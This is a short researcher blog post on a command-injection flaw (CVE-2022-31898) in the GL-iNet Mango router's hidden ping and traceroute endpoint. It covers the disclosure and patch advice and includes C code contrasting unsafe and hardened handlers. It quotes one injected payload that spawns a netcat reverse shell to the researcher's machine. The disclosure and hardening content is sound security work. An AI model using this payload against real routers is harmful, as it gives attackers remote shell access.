hacc

The GL-iNet Mango Travel Router & CVE-2022-31898

I had an hour or two to kill before a dentist appointment last summer, so I pulled out the GL-iNet Mango v2 Travel Router I had bought to hack on in just this type of situation. At $30 and about the size of a credit card, I figured I was bound to find something.

Ping and traceroute functionality exposed through the router’s web portal

And boy, did it not take long. After opening up the firmware in Ghidra and searching for calls to system() as a first shot, I stumbled across ping and traceroute functionality exposed to the web browser. It appeared to take input directly from a POST parameter and execute the ping or traceroute command with the IP address/domain name entered into the web form as an argument. While the web form’s URL was not linked to by anything in the administration portal, the /ping endpoint could be directly navigated to.

The web form itself had some basic JavaScript sanitization which prevented the easiest of all possible exploits. But, putting the request into Burp, the handler happily accepted ; nc <ip> <port> -e /bin/ash as an IP address argument to ping or traceroute, creating a reverse shell back to my machine.
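To make the bug class concrete, here is an added example (my own illustration, not GL-iNet's firmware code) of the pattern described above: a handler that splices a POST parameter into a shell command line, beside a hardened version that validates the target as a hostname/IP literal and execs ping with an argv vector so no shell ever parses the input. Function names and the ping arguments are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern (illustrative): the user-supplied target is formatted
 * straight into a command line destined for system(). A ';' in the target
 * ends the ping command and starts a second, attacker-chosen one.
 * This function only builds the string; it never executes it. */
int build_ping_cmd_unsafe(const char *target, char *out, size_t n) {
    return snprintf(out, n, "ping -c 4 %s", target);
}

/* Hardened step 1: allow-list only characters legal in hostnames and
 * IPv4/IPv6 literals. Shell metacharacters (; | & ` $ space ...) are rejected. */
bool is_safe_target(const char *s) {
    size_t len = strlen(s);
    if (len == 0 || len > 253)   /* DNS name length limit */
        return false;
    if (s[0] == '-')             /* would be parsed as a ping option */
        return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':'))
            return false;
    }
    return true;
}

/* Hardened step 2: fork + exec ping with a fixed argv, no shell involved.
 * Returns ping's exit status, or -1 on validation failure or exec error. */
int ping_safe(const char *target) {
    if (!is_safe_target(target))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execlp("ping", "ping", "-c", "4", target, (char *)NULL);
        _exit(127);              /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```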

I reported the vulnerability immediately to GL-iNet, who were gracious and professional. Sadly, I was preëmpted by another guy by several weeks, so they already had a patch ready (we were still within the first guy’s disclosure window). But, they were kind enough to throw a credit my way as well when they announced the vulnerability on their blog.

So, on that note — if you own a GL-iNet travel router (this vulnerability affects a number of their products, not just the Mango v2) — be sure to update to at least version 3.215.
